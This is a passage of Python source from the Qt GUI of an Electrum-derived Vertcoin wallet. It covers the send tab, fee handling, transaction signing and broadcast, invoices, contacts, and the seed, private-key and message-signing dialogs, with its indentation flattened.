self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Vertcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Vertcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Vertcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
self.rbf_checkbox = QCheckBox(_('Replaceable'))
msg = [_('If you check this box, your transaction will be marked as non-final,'),
_('and you will have the possiblity, while it is unconfirmed, to replace it with a transaction that pays a higher fee.'),
_('Note that some merchants do not accept non-final transactions until they are confirmed.')]
self.rbf_checkbox.setToolTip('<p>' + ' '.join(msg) + '</p>')
self.rbf_checkbox.setVisible(False)
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_slider, 5, 1)
grid.addWidget(self.fee_e, 5, 2)
grid.addWidget(self.rbf_checkbox, 5, 3)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = RED_FG, RED_FG
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = BLACK_FG, BLACK_FG
elif self.amount_e.isModified():
amt_color, fee_color = BLACK_FG, BLUE_FG
else:
amt_color, fee_color = BLUE_FG, BLUE_FG
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color)
self.fee_e.setStyleSheet(fee_color)
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is None:
return
rbf_policy = self.config.get('rbf_policy', 2)
if rbf_policy == 0:
b = True
elif rbf_policy == 1:
fee_rate = fee * 1000 / tx.estimated_size()
try:
c = self.config.reverse_dynfee(fee_rate)
b = c in [-1, 25]
except:
b = False
elif rbf_policy == 2:
b = False
self.rbf_checkbox.setVisible(b)
self.rbf_checkbox.setChecked(b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = coins
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = unicode( self.message_e.text() )
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Vertcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Vertcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins()
return outputs, fee, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.rbf_checkbox.isChecked()
if use_rbf:
tx.set_rbf(True)
if fee < tx.required_fee(self.wallet):
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.emit(SIGNAL('payment_request_ok'))
else:
self.emit(SIGNAL('payment_request_error'))
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(unicode(URI), self.on_pr)
except BaseException as e:
self.show_error(_('Invalid Vertcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.set_pay_from([])
self.rbf_checkbox.setChecked(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setMargin(0)
vbox.setSpacing(0)
vbox.addWidget(l)
buttons = QWidget()
vbox.addWidget(buttons)
return w
def create_addresses_tab(self):
from address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l)
def create_utxo_tab(self):
from utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_valid(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getOpenFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'w') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(unicode(line2.text()), str(line1.text()))
def show_master_public_keys(self):
dialog = WindowModalDialog(self, "Master Public Keys")
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(100)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(i+1)
return ''
labels = [ label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk_list = self.wallet.get_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
vbox.addWidget( QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pk_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = ("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.")
@protected
def do_sign(self, address, message, signature, password):
address = str(address.text()).strip()
message = unicode(message.toPlainText()).encode('utf-8').strip()
if not bitcoin.is_address(address):
self.show_message('Invalid Vertcoin address.')
return
if not bitcoin.is_p2pkh(address):
self.show_message('Cannot sign messages with this type of address.' + '\n\n' + self.msg_sign)
return
if not self.wallet.is_mine(address):
self.show_message('Address not in wallet.')
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = str(address.text()).strip()
message = unicode(message.toPlainText()).encode('utf-8').strip()
if not bitcoin.is_address(address):
self.show_message('Invalid Vertcoin address.')
return
if not bitcoin.is_p2pkh(address):
self.show_message('Cannot verify messages with this type of address.' + '\n\n' + self.msg_sign)
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(410, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = str(encrypted_e.toPlainText())
task = partial(self.wallet.decrypt_message, str(pubkey_e.text()),
cyphertext, password)
self.wallet.thread.add(task, on_success=message_e.setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = unicode(message_e.toPlainText())
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, str(pubkey_e.text()))
encrypted_e.setText(encrypted)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address = ''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_vtc.transaction import tx_from_str, Transaction
try:
tx = tx_from_str(txt)
return Transaction(tx)
except:
traceback.print_exc(file=sys.stdout)
self.show_critical(_("Electrum was unable to parse your transaction"))
return
def read_tx_from_qrcode(self):
from electrum_vtc import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.startswith("Vertcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
# transactions are binary, but qrcode seems to return utf8...
data = data.decode('utf8')
z = bitcoin.base_decode(data, length=None, base=43)
data = ''.join(chr(ord(b)) for b in z).encode('hex')
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
